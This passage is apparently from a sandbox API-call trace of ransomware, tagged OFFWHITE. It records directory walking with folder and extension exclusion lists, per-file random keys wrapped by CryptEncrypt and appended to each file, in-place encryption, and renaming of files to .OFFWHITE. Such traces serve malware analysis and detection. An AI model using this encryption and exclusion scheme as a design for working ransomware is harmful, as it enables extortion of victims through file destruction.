lpNewFilePointer=0x0) returned 1 [0140.428] WriteFile (in: hFile=0x214, lpBuffer=0x525120*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x525120*, lpNumberOfBytesWritten=0x295d84c*=0x100, lpOverlapped=0x0) returned 1 [0140.428] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x10e3200, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.428] WriteFile (in: hFile=0x214, lpBuffer=0x5221f0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x5221f0*, lpNumberOfBytesWritten=0x295d84c*=0x8, lpOverlapped=0x0) returned 1 [0140.428] GetProcessHeap () returned 0x500000 [0140.428] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x927c0) returned 0x2960020 [0140.428] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.428] ReadFile (in: hFile=0x214, lpBuffer=0x2960020, nNumberOfBytesToRead=0x927c0, lpNumberOfBytesRead=0x295d840, lpOverlapped=0x0 | out: lpBuffer=0x2960020*, lpNumberOfBytesRead=0x295d840*=0x927c0, lpOverlapped=0x0) returned 1 [0140.507] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.507] WriteFile (in: hFile=0x214, lpBuffer=0x2960020*, nNumberOfBytesToWrite=0x927c0, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x2960020*, lpNumberOfBytesWritten=0x295d84c*=0x927c0, lpOverlapped=0x0) returned 1 [0140.510] GetProcessHeap () returned 0x500000 [0140.510] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2960020 | out: hHeap=0x500000) returned 1 [0140.514] CloseHandle (hObject=0x214) returned 1 [0141.636] GetProcessHeap () returned 0x500000 [0141.636] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525228 | out: hHeap=0x500000) returned 1 [0141.636] GetProcessHeap () returned 0x500000 [0141.636] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525120 | out: hHeap=0x500000) returned 1 [0141.636] GetProcessHeap () returned 0x500000 [0141.636] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5315a8 | out: hHeap=0x500000) returned 1 [0141.636] GetProcessHeap () returned 0x500000 [0141.637] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x531578 | out: hHeap=0x500000) returned 1 [0141.637] lstrcpyW (in: lpString1=0x295d638, lpString2="C:/Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp" | out: lpString1="C:/Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp") returned="C:/Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp" [0141.637] lstrcatW (in: lpString1="C:/Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp.OFFWHITE") returned="C:/Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp.OFFWHITE" [0141.637] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp" (normalized: "c:\\users\\all users\\adobe\\arm\\reader_10.0.0\\adberdrupd10110_mui.msp"), lpNewFileName="C:/Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp.OFFWHITE" (normalized: "c:\\users\\all users\\adobe\\arm\\reader_10.0.0\\adberdrupd10110_mui.msp.offwhite")) returned 1 [0141.638] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2540cc00, ftCreationTime.dwHighDateTime=0x1d1056e, ftLastAccessTime.dwLowDateTime=0x2540cc00, ftLastAccessTime.dwHighDateTime=0x1d1056e, ftLastWriteTime.dwLowDateTime=0x2540cc00, ftLastWriteTime.dwHighDateTime=0x1d1056e, nFileSizeHigh=0x0, nFileSizeLow=0x109d000, dwReserved0=0x420040, dwReserved1=0x295e370, cFileName="AdbeRdrUpd10116_MUI.msp", cAlternateFileName="ADBERD~3.MSP")) returned 1 [0141.638] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp", lpString2=".") returned 1 [0141.638] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp", lpString2="..") returned 1 [0141.638] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp", lpString2="...") returned 1 [0141.638] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp", lpString2="windows") returned -1 [0141.638] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp", lpString2="$recycle.bin") returned 1 [0141.639] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp", lpString2="rsa") returned -1 [0141.639] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp", lpString2="ntuser.dat") returned -1 [0141.639] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp", lpString2="programdata") returned -1 [0141.639] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp", lpString2="appdata") returned -1 [0141.639] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp", lpString2="program files") returned -1 [0141.639] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp", lpString2="program files (x86)") returned -1 [0141.639] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\" | out: lpString1="C:/Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\") returned="C:/Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\" [0141.639] lstrcatW (in: lpString1="C:/Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\", lpString2="AdbeRdrUpd10116_MUI.msp" | out: lpString1="C:/Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp") returned="C:/Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp" [0141.639] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0141.639] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0141.639] PathFindExtensionW (pszPath="AdbeRdrUpd10116_MUI.msp") returned=".msp" [0141.639] lstrcmpiW (lpString1=".msp", lpString2=".exe") returned 1 [0141.639] lstrcmpiW (lpString1=".msp", lpString2=".log") returned 1 [0141.639] lstrcmpiW (lpString1=".msp", lpString2=".cab") returned 1 [0141.639] lstrcmpiW (lpString1=".msp", lpString2=".cmd") returned 1 [0141.639] lstrcmpiW (lpString1=".msp", lpString2=".com") returned 1 [0141.639] lstrcmpiW (lpString1=".msp", lpString2=".cpl") returned 1 [0141.639] lstrcmpiW (lpString1=".msp", lpString2=".ini") returned 1 [0141.639] lstrcmpiW (lpString1=".msp", lpString2=".dll") returned 1 [0141.639] lstrcmpiW (lpString1=".msp", lpString2=".url") returned -1 [0141.639] lstrcmpiW (lpString1=".msp", lpString2=".ttf") returned -1 [0141.639] lstrcmpiW (lpString1=".msp", lpString2=".mp3") returned 1 [0141.639] lstrcmpiW (lpString1=".msp", lpString2=".pif") returned -1 [0141.640] lstrcmpiW (lpString1=".msp", lpString2=".mp4") returned 1 [0141.640] lstrcmpiW (lpString1=".msp", lpString2=".OFFWHITE") returned -1 [0141.640] lstrcmpiW (lpString1=".msp", lpString2=".msi") returned 1 [0141.640] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0141.640] GetProcessHeap () returned 0x500000 [0141.640] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x522200 [0141.640] CreateFileW (lpFileName="C:/Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp" (normalized: "c:\\users\\all users\\adobe\\arm\\reader_10.0.0\\adberdrupd10116_mui.msp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0141.640] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x295d860 | out: lpFileSize=0x295d860*=17420288) returned 1 [0141.641] GetProcessHeap () returned 0x500000 [0141.641] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x531578 [0141.641] GetProcessHeap () returned 0x500000 [0141.641] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5315a8 [0141.641] GetProcessHeap () returned 0x500000 [0141.641] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525120 [0141.641] GetProcessHeap () returned 0x500000 [0141.641] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525228 [0141.641] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0141.641] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0141.641] SystemFunction036 (in: RandomBuffer=0x531578, RandomBufferLength=0x10 | out: RandomBuffer=0x531578) returned 1 [0141.641] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0141.641] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0141.641] SystemFunction036 (in: RandomBuffer=0x5315a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5315a8) returned 1 [0141.641] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0141.641] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0141.641] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525120*, pdwDataLen=0x295d610*=0x10, dwBufLen=0x100 | out: pbData=0x525120*, pdwDataLen=0x295d610*=0x100) returned 1 [0141.642] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0141.642] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0141.642] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525228*, pdwDataLen=0x295d60c*=0x10, dwBufLen=0x100 | out: pbData=0x525228*, pdwDataLen=0x295d60c*=0x100) returned 1 [0141.642] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x109d000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.642] SetLastError (dwErrCode=0x0) [0141.642] WriteFile (in: hFile=0x214, lpBuffer=0x525120*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x525120*, lpNumberOfBytesWritten=0x295d84c*=0x100, lpOverlapped=0x0) returned 1 [0141.644] GetLastError () returned 0x0 [0141.644] GetLastError () returned 0x0 [0141.644] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x109d100, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.644] WriteFile (in: hFile=0x214, lpBuffer=0x525228*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x525228*, lpNumberOfBytesWritten=0x295d84c*=0x100, lpOverlapped=0x0) returned 1 [0141.644] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x109d200, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.644] WriteFile (in: hFile=0x214, lpBuffer=0x522200*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x522200*, lpNumberOfBytesWritten=0x295d84c*=0x8, lpOverlapped=0x0) returned 1 [0141.644] GetProcessHeap () returned 0x500000 [0141.644] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x927c0) returned 0x2960020 [0141.645] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.645] ReadFile (in: hFile=0x214, lpBuffer=0x2960020, nNumberOfBytesToRead=0x927c0, lpNumberOfBytesRead=0x295d840, lpOverlapped=0x0 | out: lpBuffer=0x2960020*, lpNumberOfBytesRead=0x295d840*=0x927c0, lpOverlapped=0x0) returned 1 [0141.717] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.717] WriteFile (in: hFile=0x214, lpBuffer=0x2960020*, nNumberOfBytesToWrite=0x927c0, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x2960020*, lpNumberOfBytesWritten=0x295d84c*=0x927c0, lpOverlapped=0x0) returned 1 [0141.720] GetProcessHeap () returned 0x500000 [0141.720] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2960020 | out: hHeap=0x500000) returned 1 [0141.724] CloseHandle (hObject=0x214) returned 1 [0143.583] GetProcessHeap () returned 0x500000 [0143.583] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525120 | out: hHeap=0x500000) returned 1 [0143.583] GetProcessHeap () returned 0x500000 [0143.583] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525228 | out: hHeap=0x500000) returned 1 [0143.583] GetProcessHeap () returned 0x500000 [0143.583] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x531578 | out: hHeap=0x500000) returned 1 [0143.583] GetProcessHeap () returned 0x500000 [0143.584] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5315a8 | out: hHeap=0x500000) returned 1 [0143.584] lstrcpyW (in: lpString1=0x295d638, lpString2="C:/Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp" | out: lpString1="C:/Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp") returned="C:/Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp" [0143.584] lstrcatW (in: lpString1="C:/Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp.OFFWHITE") returned="C:/Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp.OFFWHITE" [0143.584] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp" (normalized: "c:\\users\\all users\\adobe\\arm\\reader_10.0.0\\adberdrupd10116_mui.msp"), lpNewFileName="C:/Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp.OFFWHITE" (normalized: "c:\\users\\all users\\adobe\\arm\\reader_10.0.0\\adberdrupd10116_mui.msp.offwhite")) returned 1 [0143.598] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2540cc00, ftCreationTime.dwHighDateTime=0x1d1056e, ftLastAccessTime.dwLowDateTime=0x2540cc00, ftLastAccessTime.dwHighDateTime=0x1d1056e, ftLastWriteTime.dwLowDateTime=0x2540cc00, ftLastWriteTime.dwHighDateTime=0x1d1056e, nFileSizeHigh=0x0, nFileSizeLow=0x109d000, dwReserved0=0x420040, dwReserved1=0x295e370, cFileName="AdbeRdrUpd10116_MUI.msp", cAlternateFileName="ADBERD~3.MSP")) returned 0 [0143.598] FindClose (in: hFindFile=0x544590 | out: hFindFile=0x544590) returned 1 [0143.598] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xf2028d90, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xf2028d90, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3a0038, dwReserved1=0x295e9f0, cFileName="Reader_10.0.0", cAlternateFileName="READER~1.0")) returned 0 [0143.598] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0143.598] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe4efbbe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe4efbbe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="ARM", cAlternateFileName="")) returned 0 [0143.598] FindClose (in: hFindFile=0x544610 | out: hFindFile=0x544610) returned 1 [0143.598] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3074f252, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3074f252, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3074f252, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0143.598] lstrcmpiW (lpString1="Application Data", lpString2=".") returned 1 [0143.599] lstrcmpiW (lpString1="Application Data", lpString2="..") returned 1 [0143.599] lstrcmpiW (lpString1="Application Data", lpString2="...") returned 1 [0143.599] lstrcmpiW (lpString1="Application Data", lpString2="windows") returned -1 [0143.599] lstrcmpiW (lpString1="Application Data", lpString2="$recycle.bin") returned 1 [0143.599] lstrcmpiW (lpString1="Application Data", lpString2="rsa") returned -1 [0143.599] lstrcmpiW (lpString1="Application Data", lpString2="ntuser.dat") returned -1 [0143.599] lstrcmpiW (lpString1="Application Data", lpString2="programdata") returned -1 [0143.599] lstrcmpiW (lpString1="Application Data", lpString2="appdata") returned 1 [0143.599] lstrcmpiW (lpString1="Application Data", lpString2="program files") returned -1 [0143.599] lstrcmpiW (lpString1="Application Data", lpString2="program files (x86)") returned -1 [0143.599] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\All Users\\" | out: lpString1="C:/Users\\All Users\\") returned="C:/Users\\All Users\\" [0143.599] lstrcatW (in: lpString1="C:/Users\\All Users\\", lpString2="Application Data" | out: lpString1="C:/Users\\All Users\\Application Data") returned="C:/Users\\All Users\\Application Data" [0143.599] lstrcatW (in: lpString1="C:/Users\\All Users\\Application Data", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Application Data\\") returned="C:/Users\\All Users\\Application Data\\" [0143.599] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/Users\\All Users\\Application Data\\" | out: lpString1="C:/Users\\All Users\\Application Data\\") returned="C:/Users\\All Users\\Application Data\\" [0143.599] lstrcatW (in: lpString1="C:/Users\\All Users\\Application Data\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Application Data\\*.*") returned="C:/Users\\All Users\\Application Data\\*.*" [0143.599] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Application Data\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe4efbbe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe4efbbe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="ARM", cAlternateFileName="")) returned 0xffffffff [0143.602] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0143.602] lstrcmpiW (lpString1="Desktop", lpString2=".") returned 1 [0143.602] lstrcmpiW (lpString1="Desktop", lpString2="..") returned 1 [0143.602] lstrcmpiW (lpString1="Desktop", lpString2="...") returned 1 [0143.602] lstrcmpiW (lpString1="Desktop", lpString2="windows") returned -1 [0143.602] lstrcmpiW (lpString1="Desktop", lpString2="$recycle.bin") returned 1 [0143.602] lstrcmpiW (lpString1="Desktop", lpString2="rsa") returned -1 [0143.603] lstrcmpiW (lpString1="Desktop", lpString2="ntuser.dat") returned -1 [0143.603] lstrcmpiW (lpString1="Desktop", lpString2="programdata") returned -1 [0143.603] lstrcmpiW (lpString1="Desktop", lpString2="appdata") returned 1 [0143.603] lstrcmpiW (lpString1="Desktop", lpString2="program files") returned -1 [0143.603] lstrcmpiW (lpString1="Desktop", lpString2="program files (x86)") returned -1 [0143.603] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\All Users\\" | out: lpString1="C:/Users\\All Users\\") returned="C:/Users\\All Users\\" [0143.603] lstrcatW (in: lpString1="C:/Users\\All Users\\", lpString2="Desktop" | out: lpString1="C:/Users\\All Users\\Desktop") returned="C:/Users\\All Users\\Desktop" [0143.603] lstrcatW (in: lpString1="C:/Users\\All Users\\Desktop", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Desktop\\") returned="C:/Users\\All Users\\Desktop\\" [0143.603] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/Users\\All Users\\Desktop\\" | out: lpString1="C:/Users\\All Users\\Desktop\\") returned="C:/Users\\All Users\\Desktop\\" [0143.603] lstrcatW (in: lpString1="C:/Users\\All Users\\Desktop\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Desktop\\*.*") returned="C:/Users\\All Users\\Desktop\\*.*" [0143.603] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Desktop\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe4efbbe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe4efbbe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="ARM", cAlternateFileName="")) returned 0xffffffff [0143.603] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3074f252, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3074f252, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3074f252, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0143.603] lstrcmpiW (lpString1="Documents", lpString2=".") returned 1 [0143.603] lstrcmpiW (lpString1="Documents", lpString2="..") returned 1 [0143.603] lstrcmpiW (lpString1="Documents", lpString2="...") returned 1 [0143.603] lstrcmpiW (lpString1="Documents", lpString2="windows") returned -1 [0143.603] lstrcmpiW (lpString1="Documents", lpString2="$recycle.bin") returned 1 [0143.603] lstrcmpiW (lpString1="Documents", lpString2="rsa") returned -1 [0143.603] lstrcmpiW (lpString1="Documents", lpString2="ntuser.dat") returned -1 [0143.604] lstrcmpiW (lpString1="Documents", lpString2="programdata") returned -1 [0143.604] lstrcmpiW (lpString1="Documents", lpString2="appdata") returned 1 [0143.604] lstrcmpiW (lpString1="Documents", lpString2="program files") returned -1 [0143.604] lstrcmpiW (lpString1="Documents", lpString2="program files (x86)") returned -1 [0143.604] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\All Users\\" | out: lpString1="C:/Users\\All Users\\") returned="C:/Users\\All Users\\" [0143.604] lstrcatW (in: lpString1="C:/Users\\All Users\\", lpString2="Documents" | out: lpString1="C:/Users\\All Users\\Documents") returned="C:/Users\\All Users\\Documents" [0143.604] lstrcatW (in: lpString1="C:/Users\\All Users\\Documents", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Documents\\") returned="C:/Users\\All Users\\Documents\\" [0143.604] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/Users\\All Users\\Documents\\" | out: lpString1="C:/Users\\All Users\\Documents\\") returned="C:/Users\\All Users\\Documents\\" [0143.604] lstrcatW (in: lpString1="C:/Users\\All Users\\Documents\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Documents\\*.*") returned="C:/Users\\All Users\\Documents\\*.*" [0143.604] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Documents\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe4efbbe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe4efbbe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="ARM", cAlternateFileName="")) returned 0xffffffff [0143.604] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3074f252, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3074f252, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3074f252, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0143.604] lstrcmpiW (lpString1="Favorites", lpString2=".") returned 1 [0143.604] lstrcmpiW (lpString1="Favorites", lpString2="..") returned 1 [0143.604] lstrcmpiW (lpString1="Favorites", lpString2="...") returned 1 [0143.604] lstrcmpiW (lpString1="Favorites", lpString2="windows") returned -1 [0143.604] lstrcmpiW (lpString1="Favorites", lpString2="$recycle.bin") returned 1 [0143.604] lstrcmpiW (lpString1="Favorites", lpString2="rsa") returned -1 [0143.604] lstrcmpiW (lpString1="Favorites", lpString2="ntuser.dat") returned -1 [0143.604] lstrcmpiW (lpString1="Favorites", lpString2="programdata") returned -1 [0143.604] lstrcmpiW (lpString1="Favorites", lpString2="appdata") returned 1 [0143.605] lstrcmpiW (lpString1="Favorites", lpString2="program files") returned -1 [0143.605] lstrcmpiW (lpString1="Favorites", lpString2="program files (x86)") returned -1 [0143.605] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\All Users\\" | out: lpString1="C:/Users\\All Users\\") returned="C:/Users\\All Users\\" [0143.605] lstrcatW (in: lpString1="C:/Users\\All Users\\", lpString2="Favorites" | out: lpString1="C:/Users\\All Users\\Favorites") returned="C:/Users\\All Users\\Favorites" [0143.605] lstrcatW (in: lpString1="C:/Users\\All Users\\Favorites", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Favorites\\") returned="C:/Users\\All Users\\Favorites\\" [0143.605] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/Users\\All Users\\Favorites\\" | out: lpString1="C:/Users\\All Users\\Favorites\\") returned="C:/Users\\All Users\\Favorites\\" [0143.605] lstrcatW (in: lpString1="C:/Users\\All Users\\Favorites\\", 